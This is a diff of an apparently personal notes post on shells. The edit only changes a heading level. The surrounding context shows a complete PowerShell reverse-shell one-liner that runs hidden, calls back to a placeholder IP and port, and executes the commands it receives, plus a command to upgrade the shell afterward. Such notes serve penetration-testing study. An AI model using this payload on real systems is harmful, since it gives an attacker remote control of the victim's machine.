--- a/_posts/notes/system/2022-04-25-shell.md
+++ b/_posts/notes/system/2022-04-25-shell.md
@@ -58,7 +58,7 @@ And Windows:
 powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```
 
-# After a reverse shell...
+## After a reverse shell...
 We can get a interactive shell with the following command:
 ```console
 $ script /dev/null -c bash
